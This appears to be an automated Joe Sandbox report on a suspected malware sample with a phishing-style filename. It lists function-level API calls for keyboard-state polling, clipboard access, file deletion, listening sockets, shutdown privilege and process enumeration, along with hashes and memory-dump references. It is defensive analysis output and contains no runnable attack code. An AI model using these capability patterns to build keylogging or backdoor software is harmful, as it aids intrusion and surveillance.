Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 2702a00c6b71f0a61b06792642892a66186589d0ccadde10fd2778e13d8fd913
Instruction ID: b59c82e9734cfe0737b39743b31b482976e3cba64178b5c08c65c0398d349b73
Opcode Fuzzy Hash: 2702a00c6b71f0a61b06792642892a66186589d0ccadde10fd2778e13d8fd913
Instruction Fuzzy Hash: CDE15E31614300AFCB14DF29C895E6ABBE5EF89714F14896DF85ADB262DB30ED01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C10219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C10241
GetAsyncKeyState.USER32(000000A0), ref: 00C102C2
GetKeyState.USER32(000000A0), ref: 00C102DD
GetAsyncKeyState.USER32(000000A1), ref: 00C102F7
GetKeyState.USER32(000000A1), ref: 00C1030C
GetAsyncKeyState.USER32(00000011), ref: 00C10324
GetKeyState.USER32(00000011), ref: 00C10336
GetAsyncKeyState.USER32(00000012), ref: 00C1034E
GetKeyState.USER32(00000012), ref: 00C10360
GetAsyncKeyState.USER32(0000005B), ref: 00C10378
GetKeyState.USER32(0000005B), ref: 00C1038A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 87ecf385783f19993bf301f2d49148383988a4e43471582bbb49dfb5e37d8593
Instruction ID: 096eb76b2aa6074772e259173f526b4afd27adeaad35906b91bb58da286e9269
Opcode Fuzzy Hash: 87ecf385783f19993bf301f2d49148383988a4e43471582bbb49dfb5e37d8593
Instruction Fuzzy Hash: D541BC349047C9AEFF319A6484083F5BEA06F17340F68449DD5E5462D2D7E45BC4A792

Uniqueness

Uniqueness Score: -1.00%

Function 00C286D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

CoInitialize.OLE32 ref: 00C28718
CoUninitialize.OLE32 ref: 00C28723
CoCreateInstance.OLE32(?,00000000,00000017,00C42BEC,?), ref: 00C28783
IIDFromString.OLE32(?,?), ref: 00C287F6
VariantInit.OLEAUT32(?), ref: 00C28890
VariantClear.OLEAUT32(?), ref: 00C288F1

Strings

NULL Pointer assignment, xrefs: 00C287C8
Failed to create object, xrefs: 00C2878E, 00C28844
Invalid parameter, xrefs: 00C2880F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: a64124c3994f776d7d9cf8e7d8ff57d11343a48683f5748de392597ac6e0b08b
Instruction ID: 4b689360f57d68cd6e7bc74fd68400ec0634f5a3de5a352c7a2e7cf3373a34bc
Opcode Fuzzy Hash: a64124c3994f776d7d9cf8e7d8ff57d11343a48683f5748de392597ac6e0b08b
Instruction Fuzzy Hash: F461DF30609321AFD710DF25D888B6EBBE4EF49B14F10481DF9959B691CB70EE48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C24458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C2447F
EmptyClipboard.USER32 ref: 00C24485
GlobalAlloc.KERNEL32(00000002,?), ref: 00C2449A
CloseClipboard.USER32 ref: 00C24539

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2ac5a13cc95a64dfcd4462eb6fba845a2cb3d4822e9fcd9019b355a48e8d91c3
Instruction ID: 25b6b47a4dfcc39bd2a32d015fb67ac184737dac6f66790b782757f65fecbb5c
Opcode Fuzzy Hash: 2ac5a13cc95a64dfcd4462eb6fba845a2cb3d4822e9fcd9019b355a48e8d91c3
Instruction Fuzzy Hash: 2321C1357106209FDB14AF20EC0AF6E7BA8EF14710F10846AF946DB2B1CB70AD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C13A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB48A1,?,?,00BB37C0,?), ref: 00BB48CE

Part of subcall function 00C14CD3: GetFileAttributesW.KERNEL32(?,00C13947), ref: 00C14CD4

FindFirstFileW.KERNEL32(?,?), ref: 00C13ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C13B87
MoveFileW.KERNEL32(?,?), ref: 00C13B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C13BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C13BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C13BF5

Strings

\*.*, xrefs: 00C13A8A, 00C13A93, 00C13AA8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 151a9095d80d0ad70f889a4d217dda00402db2c8beb69b3e872337c709a70e72
Instruction ID: 931ee7b957ce34228052dba1fe4422e4264217559a7bc26744f221c9bd49ea37
Opcode Fuzzy Hash: 151a9095d80d0ad70f889a4d217dda00402db2c8beb69b3e872337c709a70e72
Instruction Fuzzy Hash: 1B518F318051889BCF15EBA0CD929FDB7B9AF55304F2441E9E41277091EF716F49EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C1F6AB
Sleep.KERNEL32(0000000A), ref: 00C1F6DB
_wcscmp.LIBCMT ref: 00C1F6EF
_wcscmp.LIBCMT ref: 00C1F70A
FindNextFileW.KERNEL32(?,?), ref: 00C1F7A8
FindClose.KERNEL32(00000000), ref: 00C1F7BE

Strings

*.*, xrefs: 00C1F690

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 3eee571e7099176c41b1d4460d02661a5a38ac4879218a924f43d26614cf8561
Instruction ID: 60409071cb4e2d86b57ed2e1b9b16638029fafa98bdccb7ea9b23a1b5d118972
Opcode Fuzzy Hash: 3eee571e7099176c41b1d4460d02661a5a38ac4879218a924f43d26614cf8561
Instruction Fuzzy Hash: 9F41537190021A9FDF15DF64CC85AEEBBB8FF05310F14456AE815A31A1DB309E85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00BC44ED
VUUU, xrefs: 00BF7B0C
ERCP, xrefs: 00BC421F
VUUU, xrefs: 00BC44DB
VUUU, xrefs: 00BC4520

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: cc3932fab66927b299459df012c0e5d1e981ee7de53c3f8c846495e8b89c3b72
Instruction ID: 05a999dd8f5118f392246dcf8eb8dd3f96c2d94ddae57ccce582fa172e21608c
Opcode Fuzzy Hash: cc3932fab66927b299459df012c0e5d1e981ee7de53c3f8c846495e8b89c3b72
Instruction Fuzzy Hash: 7CA26B74E0421ACBDF24CF58C9A0BBDB7F1EB54314F2481EAD956A7284DB709E85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BC5A05
_memmove.LIBCMT ref: 00BC5A55
_memmove.LIBCMT ref: 00BC5ABB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b244a20b5fe9e83f6c577cd0fef54ab8ea7a692a8a0cefdc0228297c37c7f084
Instruction ID: 096b4c5cc3c817dc3ec218dc11fc5028c2ed6f37dd40c86833b217c10ab9e1ee
Opcode Fuzzy Hash: b244a20b5fe9e83f6c577cd0fef54ab8ea7a692a8a0cefdc0228297c37c7f084
Instruction Fuzzy Hash: 6C126A70A00609EBDF14DFA5D981BEEB7F5FF48300F2085A9E406A7291EB75AE51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C1545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C08D0D
Part of subcall function 00C08CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C08D3A
Part of subcall function 00C08CC3: GetLastError.KERNEL32 ref: 00C08D47

ExitWindowsEx.USER32(?,00000000), ref: 00C1549B

Strings

SeShutdownPrivilege, xrefs: 00C1546B
@, xrefs: 00C1548E
, xrefs: 00C15489

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 83ef2f33d8fe1a0a7e64794106804227493b8f54585f6ae78fa789c5e762a5d5
Instruction ID: f9fbba56388f21fd9674891e5e89f602a4cfb397913781be14587181c86b044f
Opcode Fuzzy Hash: 83ef2f33d8fe1a0a7e64794106804227493b8f54585f6ae78fa789c5e762a5d5
Instruction Fuzzy Hash: 15014731A54B01EAF7285278DC4ABFB7258EB87352F200434FC17E21D2DAB01CC0A190

Uniqueness

Uniqueness Score: -1.00%

Function 00C26596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C265EF
WSAGetLastError.WSOCK32(00000000), ref: 00C265FE
bind.WSOCK32(00000000,?,00000010), ref: 00C2661A
listen.WSOCK32(00000000,00000005), ref: 00C26629
WSAGetLastError.WSOCK32(00000000), ref: 00C26643
closesocket.WSOCK32(00000000,00000000), ref: 00C26657

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 59542ec7505f031ae05c624520493e631c7194e44ec1a674ff12e91ba73ddbf9
Instruction ID: fa350788a73ef6bec74b3a103fbb83c19fa743ba13d45a1af63276460f78965e
Opcode Fuzzy Hash: 59542ec7505f031ae05c624520493e631c7194e44ec1a674ff12e91ba73ddbf9
Instruction Fuzzy Hash: EF219E30600210AFCB10AF24D845B7EB7E9EF49720F1485A9F966A73D1CB70AD01DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FF6: std::exception::exception.LIBCMT ref: 00BD102C
Part of subcall function 00BD0FF6: __CxxThrowException@8.LIBCMT ref: 00BD1041

_memmove.LIBCMT ref: 00C0062F
_memmove.LIBCMT ref: 00C00744
_memmove.LIBCMT ref: 00C007EB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 3b01b66c158de3c375f9f5e35c9bc70272e765b9db0377db0d16958eb5eba8b7
Instruction ID: 74b74cdd6c372dd4238854388ccabe407387b1b394c6c03fd4fc4f11cf1cae3b
Opcode Fuzzy Hash: 3b01b66c158de3c375f9f5e35c9bc70272e765b9db0377db0d16958eb5eba8b7
Instruction Fuzzy Hash: 24028F70A00205DBCF14DF68D981BAEBBF5FF44300F2580A9E806DB295EB75EA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BB19FA
GetSysColor.USER32(0000000F), ref: 00BB1A4E
SetBkColor.GDI32(?,00000000), ref: 00BB1A61

Part of subcall function 00BB1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BB12D8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: f3edc7bd10a86551a1ac0832d2e321c45031014446f7a35d9007d761fbe91a3f
Instruction ID: f172917074245b56c193b20220b73d41e59b93e9b104f42cf5002801d88bf013
Opcode Fuzzy Hash: f3edc7bd10a86551a1ac0832d2e321c45031014446f7a35d9007d761fbe91a3f
Instruction Fuzzy Hash: 0CA13971115584BFDB38AB2E5CF8EFF36DDDB42381FA40999F412E6191CB90AD0192B2

Uniqueness

Uniqueness Score: -1.00%

Function 00C26A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C280A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C280CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C26AB1
WSAGetLastError.WSOCK32(00000000), ref: 00C26ADA
bind.WSOCK32(00000000,?,00000010), ref: 00C26B13
WSAGetLastError.WSOCK32(00000000), ref: 00C26B20
closesocket.WSOCK32(00000000,00000000), ref: 00C26B34

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: a1e02367be594a5ee63f0111b9bb64aa47dea29d8b669f265fbc4c88179594bb
Instruction ID: 7bcf87e7f56848c06122ace694fd6f2b0cbc19dd344fe29eada11dd055f74b13
Opcode Fuzzy Hash: a1e02367be594a5ee63f0111b9bb64aa47dea29d8b669f265fbc4c88179594bb
Instruction Fuzzy Hash: 2641B475B00610AFEB10AF24DC86FBE77E89B05710F44849CFA5AAB3D2CBB09D019791

Uniqueness

Uniqueness Score: -1.00%

Function 00C355FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C3564C
IsWindowEnabled.USER32 ref: 00C3565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00C35667
IsIconic.USER32 ref: 00C35675
IsZoomed.USER32 ref: 00C35683

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 2b5ab6df6898ac22b38d8266edbb79d3a417656fd567d6e294000c8b4c55fcb6
Instruction ID: 02ea6930b36b501d3c40a6457a0f58bcc8c7ec8f068930192b55c5331b13bef6
Opcode Fuzzy Hash: 2b5ab6df6898ac22b38d8266edbb79d3a417656fd567d6e294000c8b4c55fcb6
Instruction Fuzzy Hash: 0D11B2717109116FE7211F26DC46B6F77A8EF85721F804429F856D7341CB709A02CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C2C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BF1D88,?), ref: 00C2C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C2C324

Strings

GetSystemWow64DirectoryW, xrefs: 00C2C31E
kernel32.dll, xrefs: 00C2C30D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 9041369aa83ba64d6d09058f7d41c42398a1ba51bfa17f45249ff64f7b249c6a
Instruction ID: 5cc38e7e68b4030036d49ff88faa86c19a1ef61113460205bbe3bc7b8f0ec3bc
Opcode Fuzzy Hash: 9041369aa83ba64d6d09058f7d41c42398a1ba51bfa17f45249ff64f7b249c6a
Instruction Fuzzy Hash: 7BE0E675610713DFDB208B65E844B8E76D4EB09755B408C3DD4A5D2560D770DC41CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 456f31098a3e574ed678f0a2d7703be6ebe698bb8073e86aa789ead40ff4ec7f
Instruction ID: 2fca8f3644e43b497875942b4d1cfa7c0b457a9b9bf9609e8ac683ecbbb58636
Opcode Fuzzy Hash: 456f31098a3e574ed678f0a2d7703be6ebe698bb8073e86aa789ead40ff4ec7f
Instruction Fuzzy Hash: 4D227A716083019FC724DF24C891BAFB7E4EF84704F5089ADF99697291DB71EA48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C2F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C2F151
Process32FirstW.KERNEL32(00000000,?), ref: 00C2F15F

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Process32NextW.KERNEL32(00000000,?), ref: 00C2F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C2F22E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

